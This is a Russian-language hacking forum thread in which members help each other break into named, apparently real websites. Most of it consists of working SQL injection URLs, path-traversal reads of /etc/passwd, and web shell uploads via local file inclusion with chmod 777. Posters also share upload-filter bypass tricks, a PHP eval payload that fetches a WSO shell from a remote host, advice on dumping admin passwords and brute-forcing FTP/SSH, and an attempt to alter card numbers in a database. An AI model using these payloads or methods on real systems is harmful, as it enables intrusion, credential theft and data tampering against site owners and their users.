Fagcher said:
Может я неясно написал в первом посте, залить то я залил (через фтп) запустить не могу(( так что либо куда то еще лить, либо искать другие пути



веб-шелл запустить не можешь? А какую ошибку выдает?

попугай said:
веб-шелл запустить не можешь? А какую ошибку выдает?


Никакой, просто выкидывает на стандартную обработку(видимо когда инклуд не найден, обрабатывает так) точно такая же страница была с /etc/shadow

Тот шелл, который ты через ftp залил не надо инклюдить никуда. Заходишь на этот шелл браузером, далее заливаешь через него в /tmp/ другой шелл, права даешь ему 777 на всякий случай и инклюдишь уже его через инклюд, который ты нашел.

"Заходишь на этот шелл браузером". Как? ftp://usernameass@ip-addr/shell.php ?

Fagcher said:
"Заходишь на этот шелл браузером". Как? ftp://username
ass@ip-addr/shell.php ?


target.com/shell.php

или

ip-addr/~username/shell.php

сайт, куда ты шелл залил в общем.

Konqi said:
Fagcher

ты знаешь что такое directory traversal? или путаешь с LFI ?


Мммм, собственно а в чем разница?

Всем привет.. иногда сталкиваюсь с такой проблемой.

Инклюдю шелл (wso) или например код самого шелла вставляю в станицу шаблона форума... открываю нужную страницу, воожу пасс, попадаю в шелл.. который выглядит вот так

http://i014.radikal.ru/1105/81/b06fd20ea05a.jpg

Потом пытаюсь чтонить сделать сменить папку, открыть консоль и т.п. и меня опять выкидывает в начало... где вводить пасс

Что посоветуете?

add:

шелл залил в /tmp ...на форуме, где указываешь путь к аватару написано что папка не доступна для редактирования... ну или в этом роде... указал путь на 2 выше (/usr/local/www/site.com/www/) показала что все норм... попробовал туда залить шелл, но он там не появляется

IMMORTAL_S said:
Всем привет.. иногда сталкиваюсь с такой проблемой.
Инклюдю шелл (wso) или например код самого шелла вставляю в станицу шаблона форума... открываю нужную страницу, воожу пасс, попадаю в шелл.. который выглядит вот так
http://i014.radikal.ru/1105/81/b06fd20ea05a.jpg
Потом пытаюсь чтонить сделать сменить папку, открыть консоль и т.п. и меня опять выкидывает в начало... где вводить пасс
Что посоветуете?


юзай для таких дел шелл от маднета...

а эт какой? на форуме есть?

IMMORTAL_S said:
а эт какой? на форуме есть?


http://madnet.name/files/1/10.html

попугай said:
target.com/shell.php
или
ip-addr/~username/shell.php
сайт, куда ты шелл залил в общем.


target.com/ - я залил на сервер, в домашнюю папку пользователя. К виртуальному хосту target.com он не относится никаким боком, кроме того что сидит там же.

ip-addr/~username/shell.php, спасибо, выглядит подходяще, попробую, но в конфиге апача UserDir disabled

Fagcher said:
target.com/ - я залил на сервер, в домашнюю папку пользователя. К виртуальному хосту target.com он не относится никаким боком, кроме того что сидит там же.
ip-addr/~username/shell.php, спасибо, выглядит подходяще, попробую, но в конфиге апача UserDir disabled



А у пользователя, к которому ты залил шелл, вебдира есть? Сайт висит на пользователе? Если да, то ,собственно, читаешь файлы, узнаешь сайт, заходишь на шелл.

попугай said:
А у пользователя, к которому ты залил шелл, вебдира есть? Сайт висит на пользователе? Если да, то ,собственно, читаешь файлы, узнаешь сайт, заходишь на шелл.


Неа, не получилось через юзердир.

Пользователь - просто юзер, непонятно кем и зачем там созданный, у него есть хомдир, но вебдиректории нет. Даже в хомпапке у него ничего кроме .bashrc итп(станд. консольных конфигов нет). В апаче, как я уже говорил, запрещены UserDir. Сайт лежит в другой папке (/var/www/blah-blah/blah/web/target/). Корневая пользователя в /home/username/(именно сюда имею доступ по ftp). Так я хотел проинклудить так: www.target.com/?a=dd&b=../../../../../../../home/username/shell.php но не получается, тогда как www.target.com/?a=dd&b=../../../../../../../etc/passwd исправно дает мне файлик. я так понял что проблема в том что апач(из под которого конечно крутится www.target.com/index.php) не имеет достаточно прав чтоб почитать /home/username/shell.php

Fagcher said:
Неа, не получилось через юзердир.
Пользователь - просто юзер, непонятно кем и зачем там созданный, у него есть хомдир, но вебдиректории нет. Даже в хомпапке у него ничего кроме .bashrc итп(станд. консольных конфигов нет). В апаче, как я уже говорил, запрещены UserDir. Сайт лежит в другой папке (/var/www/blah-blah/blah/web/target/). Корневая пользователя в /home/username/(именно сюда имею доступ по ftp). Так я хотел проинклудить так: www.target.com/?a=dd&b=../../../../../../../home/username/shell.php но не получается, тогда как www.target.com/?a=dd&b=../../../../../../../etc/passwd исправно дает мне файлик. я так понял что проблема в том что апач(из под которого конечно крутится www.target.com/index.php) не имеет достаточно прав чтоб почитать /home/username/shell.php


Понял. Тогда дай /home/username и шеллу права 777 и снова проинклюдь

Подскажите как перейти в директорию выше если проверяет наличие .. ?

/news/index.php


PHP:
05/04/10";

$str=file($ref);

echo''.$str[0].'';

$ref=preg_replace("/news\//","",$ref);

echo''.$str[1].'';

for ($i=2;$i'.$arr[0].'';

$out_str.=''.$arr[1].'';

for ($i=2;$iВернуться');

}

if(isset($_GET['view'])){

show_page($_GET['view']);

}else{

show_all_news();

}

?>

попугай said:
Понял. Тогда дай /home/username и шеллу права 777 и снова проинклюдь


ОМГ. прокатило) спасибо!(там еще проблема в том что в шелле ссылки релатив, но это уже дело техники, разберусь). Реально помог.

Такой вопрос...

Нашел SQL Injection сайте из моего предыдущего поста.

Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.

Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.

В чем может быть проблема?

Как её можно решить?

SaNn said:
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?


onsalecell.com где здесь скуля?

SaNn said:
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?


Скорее всего WAF стоит. Пробуй различные обходы WAF

Не могу таблицы посчитать,

http://www.iorta.com/catalog.php?catid=47+and+1=0+union+select+unhex(he x(concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os))),2+--+

5.0.1-alpha-log:trade:tradeuser@localhostc-linux

тут, все выводит, а дальше не получается

http://www.iorta.com/catalog.php?catid=-47+union+select+1,count(*)+from+information_schema .tables+--+

Что можете посоветовать?

FlaktW

не скажу на 100%, но на сколько я помню, в мускул 5.0.1 альфа information_schema еще не было

Konqi said:
FlaktW
не скажу на 100%, но на сколько я помню, в мускул 5.0.1 альфа information_schema еще не было



Наверное, ты прав!

http://gonqueror.narod.ru/m5.png

пруф

Возможно ли, если показывает пустую страницу (как тут: http://www.goldenformula.net/news.php?id=%27) что там есть скуль?!

Когда отключен вывод ошибки, а из-за неверно переданных данных в переменной id рушится запрос к базе, и в ответ ничего не возвращается к выводу, как думаешь возможно?


Code:
http://goldenformula.net/news.php?id=(47)and(1=0)union/*!all*/select(1),2,3,4,version(),6--+

вот вот про это где можно почитать, на русском

By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold:

it uses a security control that lists HTTP verbs

the security control fails to block verbs that are not listed

it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb

For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword:

является ифективным методом атаки?

Koren said:
вот вот про это где можно почитать, на русском
By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold:
it uses a security control that lists HTTP verbs
the security control fails to block verbs that are not listed
it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb
For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword:
является ифективным методом атаки?


Если я не ошибаюсь, то эта уязвимость позволяет обходить basic-авторизацию отправляя запросы постом а не гетом.

https://www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf

Expl0ited said:
Когда отключен вывод ошибки, а из-за неверно переданных данных в переменной id рушится запрос к базе, и в ответ ничего не возвращается к выводу, как думаешь возможно?

Code:
http://goldenformula.net/news.php?id=(47)and(1=0)union/*!all*/select(1),2,3,4,version(),6--+



Кстати, можно и так: +and+1=0+union+select+1,2,3,4,database(),6--

Не получается вывести версию БД.

http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+

FlaktW said:
Не получается вывести версию БД.
http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+




Code:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),f loor(rand(0)*2))/*!having*/+min(0)+or+1--+

raw said:

Code:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),f loor(rand(0)*2))/*!having*/+min(0)+or+1--+



Дальше не выводится, а где ошибка не пойму:

http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+table_name+f rom+information_schema.`tables`+limit+0,1),floor(r and(0)*2))/*!having*/+min(0)+or+1+--+

FlaktW said:
Дальше не выводится, а где ошибка не пойму:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+table_name+f rom+information_schema.`tables`+limit+0,1),floor(r and(0)*2))/*!having*/+min(0)+or+1+--+




Code:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select/*!table_name*/+from+information_schema.tables+limit+0,1),floor(r and(0)*2))/*!having*/+count(*)+or+1--+

Ты так и будешь спрашивать каждый следующий шаг? Тогда я пожалуй катапультируюсь из данного трэда.

Привет всем. Как вывести часть файла..? more что-то не работает.

При cat начало не видно... большой файл.

IMMORTAL_S said:
Привет всем. Как вывести часть файла..? more что-то не работает.
При cat начало не видно... большой файл.


Какая именно ось?

Пробуй less..

Почему в уязвиостях? Или я что-то не понял? о_О

IMMORTAL_S said:
Привет всем. Как вывести часть файла..? more что-то не работает.
При cat начало не видно... большой файл.



head, tail

>Почему в уязвиостях? Или я что-то не понял? о_О

Просто еще кое что хотел спросить... да не стал

thnx.. буду вникать

Есть слепая скуля. Вывод ошибок отключен. Не работают функции mid(),substr() и т.д. Подзапросы выполнятся успешно, а когда в скули есть mid(), substr() то запрос всегда возвращает false. Может это не mysql? И как теперь мне ее крутить если она слепая?

Админка Indrive v4.01b поддерживает заливку jpg, jpeg, gif, png, doc, pdf, xls, zip, rar -файлов.

Заливка шелла через картинки не получилась, как я ни старался. Реально ли залить шелл через оставшиеся форматы?

zlo12 said:
Админка Indrive v4.01b поддерживает заливку
jpg, jpeg, gif, png,
doc, pdf, xls, zip, rar -файлов.
Заливка шелла через картинки не получилась, как я ни старался. Реально ли залить шелл через оставшиеся форматы?



Скорее всего, нет.

zlo12 said:
Админка Indrive v4.01b поддерживает заливку
jpg, jpeg, gif, png,
doc, pdf, xls, zip, rar -файлов.
Заливка шелла через картинки не получилась, как я ни старался. Реально ли залить шелл через оставшиеся форматы?


Какой веб-сервер стоит?

Expl0ited said:
Какой веб-сервер стоит?


nginx/0.7.67

zlo12 said:
nginx/0.7.67


Попробуй залить картинку с php кодом, и обратится к ней как к php скрипту, пример, картинка test.gif в неё пишешь


PHP:


заливается сюда:


Code:
http://site.com/upload/img/test.gif

обращаешься так


Code:
http://site.com/upload/img/test.gif/.php

Подробнее: http://habrahabr.ru/blogs/sysadm/100961/

Expl0ited на этом не сработало, инфа полезная, спасибо что навёл

zlo12 said:
Expl0ited
на этом не сработало, инфа полезная, спасибо что навёл


Попробуй через mod_mime с подделкой content-type.

Для FF качаешь дополнение Tamper Data. Возьми любую реальную картинку и вставь ей вконец php код. Включи Tamper Data. Отошли свою картинку и подмени имя картинки на: filename.php.jpglolo. Если включен mod_mime и кривая регулярка для проверки файла (проверит последнее вхождение .jpg и пропустит следующую приписку "lolo"), то у тебя будет работоспособный php-файл. Ничего не отрезается, т.е. обращаться по прямому пути: localhost/images/filename.php.jpglolo

Работает из-за включенного mod_mime.

Написал так много пунктов, потому что там может быть проверка Content-type, проверка картинки на валидность и т.д, а ты дал мало информации, ну а так наверняка.

Если картинки чем-то сжимается на стороне сервера, то эксплуатировать не получится.

Так же если идет фильтрация по черному списку (запрещаются всякие php, php5, phtml, etc), то можно залить .htaccess файл, который будет содержать код для выполнение картинок как php-файл.

P.S.: Только сейчас увидел, что у тебя nginx. Под nginx не работает это. Нужен Apache.

Tigger идея чертовски хороша. но по ходу никак, тиц 250 и 90, могу за пару сотен отдать оба кому-нибудь. жалко выкидывать.

и ещё один вопрос: в последнее время часто стал сталкиваться с тем, что в базах к сайтам попросту отсутсвуют логины с паролями или есть, но не подходят. Что в этих случаях делать?

ZARO said:
Есть слепая скуля. Вывод ошибок отключен. Не работают функции mid(),substr() и т.д. Подзапросы выполнятся успешно, а когда в скули есть mid(), substr() то запрос всегда возвращает false. Может это не mysql? И как теперь мне ее крутить если она слепая?


Кинь ссылку сюда или в личку, попробую раскрутить

zlo12 said:
Tigger
идея чертовски хороша. но по ходу никак, тиц 250 и 90, могу за пару сотен отдать оба кому-нибудь. жалко выкидывать.
и ещё один вопрос: в последнее время часто стал сталкиваться с тем, что в базах к сайтам попросту отсутсвуют логины с паролями или есть, но не подходят. Что в этих случаях делать?


Если отсутствуют, то возможно:

1) В другой БД

2) доступ в админку по данным из файла

3) Таблица названа не "admin" а к примеру "images_222". Ищи таблицы с условием что в ней есть колонки LIKE '%pass%' и т.д.

Если пасы не подходят:

1) Искать другую админку

2) Просканировать сабдомены

3) Пробрутить FTP \ SSH с использованием хакерской догадки. (Хакерская догадка нужна для подбора логина. Примеры: то что вытащил из скули, root, www, user() которого вытащил скули, site.ru, site, siteru, ftp, etc.....)

помогите разобраться:


http://board.salle.com.ua/index.php?catid=25+OR+(SELECT+COUNT(*)+FROM+(SELEC T+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCA T(MID(VERSION(),1,63),+FLOOR(RAND(0)*2)))


как я понимаю это блинд, но она по идее выводит результаты в отчетах об ошибке, как ту можно еще вывод посмотреть?

winstrool said:
как я понимаю это блинд


С чего ты взял?

M_script said:
С чего ты взял?


потому что запросы ввиде:

+union+select+1,2,3,4,5,6,7,8,9--

+/!union+select+1,2,3,4,5,6,7,8,9--

не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...

winstrool said:
а group+by+ говорит что их 9


Сравни запросы:


Code:
http://board.salle.com.ua/index.php?catid=25+order+by+9--+



Code:
http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+

Результат одинаковый

Там нет скули. Все символы, кроме цифр пропускаются, поэтому приведенные выше запросы эквивалентны запросу


Code:
http://board.salle.com.ua/index.php?catid=259

M_script said:
Сравни запросы:

Code:
http://board.salle.com.ua/index.php?catid=25+order+by+9--+


Code:
http://board.salle.com.ua/index.php?catid=25+pohui+chto+pisat+9--+

Результат одинаковый


а если так:


http://board.salle.com.ua/index.php?catid=25+order+by+10--




http://board.salle.com.ua/index.php?catid=25+pohui+chto+ne+napishesh+9--+

winstrool said:
потому что запросы ввиде:
+union+select+1,2,3,4,5,6,7,8,9--
+/!union+select+1,2,3,4,5,6,7,8,9--
не проходят, а group+by+ говорит что их 9, а приведеный выше запрос проходит, но введу того что отчет об ошибках там отключен, мы не можем его увидеть, вот и интиресует, что в такой ситуации еще можно придумать...


Думаю, что это Oracle.

winstrool said:
а если так:


Да хоть так:


Code:
http://board.salle.com.ua/index.php?catid=2a--_asdqwe@fdMk,.asdl;|+5+$Kfd9

M_script said:
Там нет скули. Все символы, кроме цифр пропускаются, поэтому приведенные выше запросы эквивалентны запросу

Code:
http://board.salle.com.ua/index.php?catid=259



ммм, вообще то там скорее есть уязвимость, т.к.


Code:
http://board.salle.com.ua/index.php?catid=25 // возвращает "Объявления раздела Продукты"
http://board.salle.com.ua/index.php?catid=0+or+25 // возвращает "Объявления раздела Продукты"
http://board.salle.com.ua/index.php?catid=0+or+24 // возвращает "Объявления раздела Оборудование"

из чего делаем вывод, что там просто фильтр-блэклист "вредных" символов и слов, обойти который я пока не смог

Да и запрос там такой:


Code:
select cat_name from board_category where cat_id = ДАННЫЕ

Исходя из этого:


Code:
http://board.salle.com.ua/index.php?catid[]=

Expl0ited said:
из чего делаем вывод, что там просто фильтр-блэклист "вредных" символов и слов, обойти который я пока не смог


Я же написал - фильтруется все, кроме цифр.

0+or+25 вернет то же самое, что и 25, 025 или к примеру 0№*)_(hfb2JMU5

Согласен, там скорее всего preg_match, т.к. он убирает из запроса всё кроме букв, т.е. при запросе


Code:
http://board.salle.com.ua/index.php?catid=25+order+by+10

он ничего не возвращает, а при запросе


Code:
http://board.salle.com.ua/index.php?catid=25+order+by+9

он возвращает 259 страницу:


Code:
http://board.salle.com.ua/index.php?catid=259

HEEEEEEEEEELP!!

Есть oracle 10g sql injection вида:


http://site.com/index.php?mod=news')+or+1=utl_inaddr.get_host_addr ess((select+table_name+from+sys.user_tables+where+ rownum=1))--+


Можно ли как нибудь изменить значение в базе данных?

Например пробую так:


http://site.com/index.php?mod=news')+and+(update+CARDS+set+CARD_NU MBER='5454908770100000'+where+rownum=1)+from+dual--+


Выдает ошибку:


Ошибка исполнения запроса : ORA-00936: отсутствует выражение


Помогите плз!

Помогите раскрутить, не знаю, как подступиться!

http://www.dougie-poynter.com/discography/release.php?id=23'

FlaktW said:
Помогите раскрутить, не знаю, как подступиться!
http://www.dougie-poynter.com/discography/release.php?id=23'


Запрос:


Code:
http://www.dougie-poynter.com/discography/release.php?id=-1/**/union/**//*!select*//**/1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,10,11,12,13,14,15

Результат:


Code:
5.0.92-community:dougie_user@localhost:dougie_

LiRvD082, кинь ссылку в ЛС

что может означать символ "~" в конце расширения файла на фряхе ?

_____________________

AleksNEW said:
Доброго времени суток. Вопрос следующий:
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT - good
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT' -bad
Это SQL ?


Нет.

http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=true

http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=false

Файлы с тильдой на конце обычно являются файлами отката различных текстовых редакторов

Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(fi le_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630

Почему выскакивает такая штука, и как это обойти? Спасибо.

Вот запрос:


Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28 file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;

o'clock said:

Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(fi le_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630

Почему выскакивает такая штука, и как это обойти? Спасибо.
Вот запрос:

Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28 file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;



А не проще ли было загуглить ф-цию \ ошибку?

Функция не может распарсить URL, потому что URL для нее невалиден.

o'clock said:

Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(fi le_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630

Почему выскакивает такая штука, и как это обойти? Спасибо.
Вот запрос:

Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28 file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;



о0, хакер, ты не мог бы объяснить мне этот запрос?

union select ''

Во-первых, там нет прав, если ты планировал залить результаты выборки(читай твой зло-код эвала) селекта в файл. К томуже, твоя конструкция(без outfile, etc) ни к чему бы и не привела=/

Во-вторых, где ты там скулю увидел?

В-третьих, вот скуля с выводом, логин и пасс одмино.


Code:
http://www.sko-lotos.com/catalog.php?id=381'and(0)union select 1,concat_ws(0x3b, name, password),3,4,5,6,7 from users-- -

имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?

foozzi said:
имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?


Если б всё было так просто. Если сервер nginx попробуй в URl набрать wso2.php.gif/.php

2 foozzi

почитай вот это (https://rdot.org/forum/showpost.php?p=1142&postcount=6)


file.PHP (file.PHP3 и т.д.)-- если в проверке по чёрному списку использовали регистрозависимые функции
file.jpg.php, file.gif.php (и вариации) -- при кривых регулярках
file.php.giflalala, file.php.lalalajpg -- кривые регулярки и mod_mime
file.php%00.gif -- опять-же криворукие программеры (тут несколько вариантов зависящих от реализации, например расширение отрубается при копировании, в функции copy() и мы получаем файл с расширением .php)

Здесь через ошибку помогите вывести:

http://dahliasuppliers.com/noahsclassifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=11'+order+by+26+--+&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&clearoff=1

На сайте блинд скуль, но почему-то я не могу даже узнать версию бд, подскажите пожалуйста, что сделать чтоб узнать?


Code:
http://www.trudprava.ru/ibp.php?id=1%20and%20substring%28@@version,1,1%29= 5